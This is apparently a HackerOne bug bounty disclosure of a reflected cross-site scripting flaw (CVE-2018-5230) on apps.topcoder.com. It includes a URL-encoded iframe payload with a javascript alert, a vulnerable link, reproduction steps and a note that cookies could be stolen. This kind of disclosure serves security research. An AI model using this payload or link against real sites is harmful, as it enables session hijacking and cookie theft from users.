Topcoder: Cross Site Scripting via CVE-2018-5230 on https://apps.topcoder.com

2020-01-23T06:16:46
ID H1:781284
Type hackerone
Reporter 0x496
Modified 2020-02-24T04:18:47

Description

Hi, I found reflected xss on https://apps.topcoder.com via error message..

Payload : %3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm

Vulnerable link : https://apps.topcoder.com/wiki/labels/%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%22%3E.vm

Step to reproduce : Create an account and visit the vulnerable url..

{F693517}

References :

https://www.cvedetails.com/cve/CVE-2018-5230/ https://www.exploit-db.com/exploits/37791

Best regards..

Impact

Hackers can steal victim`s cookies